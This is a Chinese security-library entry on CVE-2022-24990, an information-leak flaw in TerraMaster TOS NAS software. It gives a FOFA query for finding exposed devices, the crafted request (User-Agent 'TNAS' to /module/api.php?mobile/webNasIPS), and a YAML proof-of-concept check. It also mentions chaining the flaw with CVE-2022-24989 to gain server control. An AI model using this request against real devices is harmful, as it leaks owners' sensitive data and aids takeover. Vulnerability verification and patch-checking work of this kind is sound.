TerraMaster TOS 信息泄漏漏洞 (CVE-2022-24990)–小白-漏洞文库小世界-安全文库-NGC660 安全实验室

TerraMaster TOS 信息泄漏漏洞 (CVE-2022-24990)–小白

1.TerraMaster TOS 信息泄漏漏洞 CVE-2022-24990

1.1.漏洞描述

TerraMaster TOS 存在信息泄漏漏洞,攻击者通过漏洞可以获取服务器上的敏感信息,配合 CVE-2022-24989漏洞可以获取服务器权限

1.2.漏洞影响

TerraMaster TOS < 4.2.31

1.3.FOFA

“TerraMaster” && header=“TOS”

1.4.漏洞复现

登录界面如下:
1647827849516-e35726eb-d69c-4962-a85c-f0b9a4184ae7

添加 User-Agent: TNAS, 我们就可以调用这个方法来获取服务器中敏感信息

/module/api.php?mobile/webNasIPS

1647827850202-9b62b7dd-8363-4fd2-b7ed-d0ac89655487

1.5.poc

params: []
name: TerraMaster TOS 信息泄漏漏洞
set: {}
rules:
- method: GET
  path: /module/api.php?mobile/webNasIPS
  headers:
    'User-Agent: ': TNAS
  body: ""
  search: ""
  followredirects: false
  expression: response.status == 200 && response.body.bcontains(b"webNasIPS successful")
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""

1647827850375-038820d7-5657-45cc-a3c3-f22ce23317d6

请登录后发表评论

    请登录后查看回复内容